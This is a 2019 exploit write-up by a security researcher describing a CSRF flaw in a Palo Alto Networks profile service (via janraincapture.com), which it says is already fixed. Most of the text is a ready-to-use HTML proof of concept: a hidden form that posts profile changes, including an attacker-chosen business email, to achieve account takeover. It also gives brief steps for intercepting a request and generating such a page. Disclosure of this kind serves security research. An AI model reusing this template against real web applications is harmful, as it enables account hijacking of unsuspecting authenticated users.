** Note : this vulnerability is already fixed by paloalto security team # Exploit Title: Missing CSRF Token Leads to account full takeover (All accounts can be hijacked) # Google Dork: [N/A] # Date: [JUl 23 2019] # Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998 # Vendor Homepage:https://www.paloaltonetworks.com # Software Link: N/A # Version: [8.0] # Tested on: [Parrot OS] # CVE : [N/A] # Acknowledgement: https://www.paloaltonetworks.com/security-researcher-acknowledgement summary ---------- Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. Steps to generate ---------------------- >> Initially account should be authenticated >> for testing purpose i changed email address ..and account was fully takeover if html files not works then follow this steps >> go to profile setting >> change your profile details >> then intercept that request >> then generate csrf poc and then try in browser..boom! account cresdentials will be changed . PoC --- <html> <!-- CSRF PoC --> <body> <script>history.pushState('', '', '/')</script> <form action=" https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp" method="POST"> <input type="hidden" name="utf8" value="â&#156;&#147;" /> <input type="hidden" name="access&#95;token" value="m5xw97v7uy63yqw7" /> <input type="hidden" name="capture&#95;screen" value="editProfile" /> <input type="hidden" name="js&#95;version" value="d445bf4" /> <input type="hidden" name="capture&#95;transactionId" value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" /> <input type="hidden" name="form" value="editProfileForm" /> <input type="hidden" name="flow" value="customstandardflow" /> <input type="hidden" name="client&#95;id" value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" /> <input type="hidden" name="redirect&#95;uri" value="http&#58;&#47;&#47;localhost&#47;" /> <input type="hidden" name="response&#95;type" value="token" /> <input type="hidden" name="flow&#95;version" value="20190502085125375950" /> <input type="hidden" name="settings&#95;version" value="" /> <input type="hidden" name="locale" value="en&#45;US" /> <input type="hidden" name="recaptchaVersion" value="2" /> <input type="hidden" name="Salutation" value="" /> <input type="hidden" name="First&#95;Name&#95;&#95;c" value="EMAIL_HIJACKED" /> <input type="hidden" name="Middle&#95;Name&#95;&#95;c" value="" /> <input type="hidden" name="Last&#95;Name&#95;&#95;c" value="test" /> <input type="hidden" name="suffix" value="" /> <input type="hidden" name="Email&#95;Display&#95;Name" value="hpankajjj" /> <input type="hidden" name="Business&#95;Email" value="pankajTESTHIJACKED&#64;yopmail&#46;com" /> <input type="hidden" name="Personal&#95;Email" value="" /> <input type="hidden" name="Business&#95;Phone" value="9999999999" /> <input type="hidden" name="MobilePhone" value="" /> <input type="hidden" name="Company" value="AbeBooks" /> <input type="hidden" name="Title" value="" /> <input type="hidden" name="Job&#95;Role&#95;&#95;c" value="Administrator" /> <input type="hidden" name="Job&#95;Level&#95;&#95;c" value="" /> <input type="hidden" name="Address1" value="" /> <input type="hidden" name="Address2" value="" /> <input type="hidden" name="City" value="" /> <input type="hidden" name="Zip&#95;or&#95;Postal&#95;Code" value="" /> <input type="hidden" name="Country" value="India" /> <input type="hidden" name="Alt&#95;State&#95;Province&#95;&#95;c" value="" /> <input type="hidden" name="province" value="" /> <input type="hidden" name="Preferred&#95;Communication" value="" /> <input type="hidden" name="language&#95;&#95;c" value="en&#95;US" /> <input type="hidden" name="location&#95;&#95;c" value="India" /> <input type="hidden" name="BreachPrevention&#95;hidden" value="" /> <input type="hidden" name="BYOD&#95;hidden" value="" /> <input type="hidden" name="CloudSecurity&#95;hidden" value="" /> <input type="hidden" name="Cybersecurity&#95;hidden" value="" /> <input type="hidden" name="DataCenterVirtualization&#95;hidden" value="" /> <input type="hidden" name="EndpointSecurity&#95;hidden" value="" /> <input type="hidden" name="Firewalls&#95;hidden" value="" /> <input type="hidden" name="Mobility&#95;hidden" value="" /> <input type="hidden" name="NetworkSecurity&#95;hidden" value="" /> <input type="hidden" name="NetworkPerimeter&#95;hidden" value="" /> <input type="hidden" name="NextGenerationFirewall&#95;hidden" value="" /> <input type="hidden" name="SaaSSecurity&#95;hidden" value="" /> <input type="hidden" name="ThreatPrevention&#95;hidden" value="" /> <input type="hidden" name="subscribeToNewsAndProductUpdates&#95;hidden" value="" /> <input type="hidden" name="subscribeToEventsAndWebinars&#95;hidden" value="" /> <input type="hidden" name="subscribeToUnit42ThreatResearch&#95;hidden" value="" /> <input type="hidden" name="tab1complete&#95;&#95;c" value="true" /> <input type="hidden" name="tab2complete&#95;&#95;c" value="false" /> <input type="hidden" name="tab3complete&#95;&#95;c" value="false" /> <input type="hidden" name="tab4complete&#95;&#95;c" value="false" /> <input type="hidden" name="tab5complete&#95;&#95;c" value="false" /> <input type="submit" value="Submit request" /> </form> </body> </html> THANK YOU PANKAJ KUMAR THAKUR INDP.Security Researcher | Certified Ethical Hacker | Red Team at SYNACK Inc | OSCP